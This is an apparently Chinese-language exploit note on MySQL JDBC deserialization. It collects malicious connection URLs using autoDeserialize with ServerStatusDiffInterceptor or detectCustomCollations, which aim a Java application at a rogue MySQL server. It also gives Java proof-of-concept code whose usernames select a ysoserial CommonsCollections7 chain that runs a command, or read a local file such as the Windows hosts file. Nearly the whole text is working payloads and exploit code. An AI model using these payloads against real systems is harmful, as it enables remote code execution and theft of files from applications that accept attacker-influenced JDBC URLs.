漏洞原理
恶意MySQL服务器搭建可参考:
各种payload小结
ServerStatusDiffInterceptor触发点
jdbc:mysql://x.x.x.x:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor
属性名不同,queryInterceptors换为statementInterceptors:
jdbc:mysql://x.x.x.x:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor
jdbc:mysql://x.x.x.x:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor
detectCustomCollations触发点
jdbc:mysql://x.x.x.x:3306/test?detectCustomCollations=true&autoDeserialize=true
jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true
漏洞利用
public class Jdbctest {
public static void main(String[] args) throws Exception {
Class.forName("com.mysql.jdbc.Driver");
String jdbc_url = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor";
Connection con = DriverManager.getConnection(jdbc_url, "yso_CommonsCollections7_calc", "root"); // 其中红色部分的username是需要调整的,yso为指定使用反序列化模块,CommonsCollections7指定使用CC7的链,calc指定CC的命令参数。
}
}
public class Jdbctest {
public static void main(String[] args) throws Exception {
Class.forName("com.mysql.jdbc.Driver");
String jdbc_url = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor";
Connection con = DriverManager.getConnection(jdbc_url, "fileread_c:\\windows\\system32\\drivers\\etc\\hosts", "root");
}
}
参考链接:
https://www.mi1k7ea.com/2021/04/23/MySQL-JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/#JDBC%E7%AE%80%E4%BB%8B
https://c014.cn/blog/java/JDBC/MySQL%20JDBC%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.html